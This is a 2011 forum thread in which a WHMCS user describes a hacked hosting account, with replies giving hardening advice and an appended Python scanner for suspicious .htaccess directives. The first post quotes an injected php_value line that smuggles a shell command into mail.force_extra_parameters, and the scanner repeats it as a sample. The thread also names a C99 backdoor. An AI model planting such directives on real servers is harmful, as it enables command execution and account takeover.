raymon Posted July 28, 2011

I am facing a really hard time with my account. It has been hacked by some deadbeat who created a bunch of orders and registered some domain names. I wonder if there is an issue with a loophole or something with whmcs. My whmcs says I should upgrade but HostingZoom offers whmcs 4.4.2 as their latest version.

All I know is that I ended up with my website inaccessible. It came to be a permission error. When I tried to access my website (on which whmcs is installed) I got a permission error. I emailed my host Hosting Zoom and they said I have an invalid instruction in .htaccess.

This is what I got in htaccess:

    php_value mail.force_extra_parameters '-t && ls /home/ > /home/webiano/public_html/result.txt'

Then I found a bunch of php files which I transferred to my local computer. 3 files were instantly removed by Microsoft Security Essentials and they are called the following:

VirTool:JS/Obfuscator.AQ
VirTool:JS/Obfuscator.BO
Backdoor:PHP/C99shell.G

The rest of the files are not detected by Security Essentials but they contain suspicious data/language progs.

1) Does anyone know how to prevent such a malicious takeover in the future? Any suggestions?
2) I want to restrict login through whmcs to only my range (my country). Is this possible?
3) Do you think imposing a password (htaccess) on the directory of whmcs would make it harder for the hacker to access my whmcs account?

I am really unsure how to defend myself. This takeover probably cost me a lot basically because of registered domains $70 and it left me really feeling unsafe regarding the whole thing. I don't know how to approach this issue and prevent future incidents. An insight would be really appreciated.

mylove4life Posted July 28, 2011

It's not WHMCS, that's for sure, but something else with the server. If it was me I'd redo the whole computer from scratch and go over all the WHMCS files and website you have.

brianoz Posted July 28, 2011

There are a lot of ways to defend yourself against this sort of attack, but frankly, since you don't understand what you're doing, you'd be much better looking for a hosted WHMCS solution - where someone else runs your WHMCS on their server and keeps it secure for you. Hope you don't mind me being blunt; I really think this would be the safest thing for you maybe for a year or two until you understand all the issues.

It looks a little to me like your host isn't secure either; you should be looking for things like, at an absolute minimum:

- mod_security
- CSF firewall, with auto-block for hackers who hit mod_security rules a lot
- suphp or fastcgi so php doesn't run as a common user
- security hardening - generally

There are other things like virus/security scanning of uploads which is also a really good idea.

cmsplushosting Posted July 28, 2011

I agree with this one... Without prior knowledge on administrating or the know-how on keeping stuff secure, a hosted version would be your best bet; managed by someone else or a qualified company to handle your server management tasks. Having this behind you will help immensely.

> There are a lot of ways to defend yourself against this sort of attack, but frankly, since you don't understand what you're doing, you'd be much better looking for a hosted WHMCS solution - where someone else runs your WHMCS on their server and keeps it secure for you. Hope you don't mind me being blunt; I really think this would be the safest thing for you maybe for a year or two until you understand all the issues.
>
> It looks a little to me like your host isn't secure either; you should be looking for things like, at an absolute minimum:
>
> - mod_security
> - CSF firewall, with auto-block for hackers who hit mod_security rules a lot
> - suphp or fastcgi so php doesn't run as a common user
> - security hardening - generally
>
> There are other things like virus/security scanning of uploads which is also a really good idea.

Lawrence Posted July 28, 2011

At the very least, I'd suggest hardening your PHP configuration (an insecure configuration is normally how a C99 shell is able to get installed), and invest in CSF and CXS from configserver.com if you are using a cPanel server.
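
Added example, not part of the thread or of any poster's message: a defender's check that walks a web root and flags .htaccess lines like the one quoted in the first post. It goes slightly beyond that one directive; the `RISKY_SETTINGS` list, the function names and the sample file are assumptions made for illustration.

```python
import re
import sys
from pathlib import Path

# Assumption: PHP settings that are rarely set legitimately from .htaccess and that
# influence a command line or the code PHP loads. Extend to suit your environment.
RISKY_SETTINGS = {"mail.force_extra_parameters", "auto_prepend_file", "auto_append_file"}

DIRECTIVE = re.compile(r"^\s*php_(?:admin_)?(?:value|flag)\s+(\S+)\s+(.*)$", re.IGNORECASE)
SHELL_META = re.compile(r"&&|\|\||[;|`<>]|\$\(")  # command chaining, pipes, redirection

# Constructed sample; the mail.force_extra_parameters line is the one quoted in the first post.
SAMPLE = "\n".join([
    "# constructed sample .htaccess",
    "RewriteEngine On",
    "php_value mail.force_extra_parameters '-t && ls /home/ > /home/webiano/public_html/result.txt'",
    "php_value upload_max_filesize 16M",
])

def scan_htaccess_text(text):
    """Return (line number, setting, reasons) for each suspicious php_value/php_flag line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # skip comments
        match = DIRECTIVE.match(line)
        if not match:
            continue
        setting, value = match.group(1).lower(), match.group(2).strip()
        reasons = []
        if setting in RISKY_SETTINGS:
            reasons.append("risky setting")
        if SHELL_META.search(value):
            reasons.append("shell metacharacters in value")
        if reasons:
            findings.append((lineno, setting, reasons))
    return findings

def scan_tree(root):
    """Scan every .htaccess under root; return {path: findings} for files with hits."""
    results = {}
    for path in Path(root).rglob(".htaccess"):
        hits = scan_htaccess_text(path.read_text(errors="replace"))
        if hits:
            results[str(path)] = hits
    return results

if __name__ == "__main__":
    # With a directory argument, scan it; otherwise scan the constructed sample.
    print(scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_htaccess_text(SAMPLE))
```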